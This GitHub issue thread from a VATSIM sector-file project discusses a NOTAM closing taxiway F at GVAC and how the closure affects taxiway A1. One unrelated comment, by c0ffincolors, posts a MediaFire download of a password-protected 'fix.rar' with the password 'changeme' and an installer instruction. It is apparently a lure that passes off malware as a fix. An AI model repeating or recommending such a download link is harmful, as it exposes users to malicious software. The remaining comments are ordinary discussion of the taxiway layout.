### ISSUE TITLE
[NOTAM] GVAC TWY F CLOSED

### ISSUE THREAD

**Issue by miguelalbano** [VATSIM-SSA/sectorfile-gvsc#3]
**Applicable NOTAM**
A0075/24 

**Description**
GVAC TWY F CLOSED

**What features does this NOTAM impact?**
- [ ] Ground Layout
- [ ] Ground Radar
- [ ] TopSky
- [ ] vATIS

**Screenshots**
If possible, attach screenshots that demonstrate the need.

**Additional context**
Add any other context about the ground layout request here.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by BrakingChanges** [comment]
A1 extends all the way up to the runway, shouldn't cause a problem with F

**Comment by RoboFun01** [comment]
> A1 extends all the way up to the runway, shouldn't cause a problem with F
I do not understand sorry. The NOTAM is that taxiway F is closed. What do you interpret as taxiway F then? If, taxiway F is the red, and it is closed, doesnt that mean that A1 cant be used anymore?

**Comment by BrakingChanges** [comment]
> > A1 extends all the way up to the runway, shouldn't cause a problem with F
> 
> I do not understand sorry. The NOTAM is that taxiway F is closed. What do you interpret as taxiway F then? If, taxiway F is the red, and it is closed, doesnt that mean that A1 cant be used anymore?

I understand F as only green, as that's the general location where the taxiway label is pointing. Also A1 and F are seperated by the holding line, so A1 extends all the way to the hold which shouldn't cause a problem 
![image](https://github.com/user-attachments/assets/10a5fd56-64d0-4761-a0f4-4e6c21ba8217)
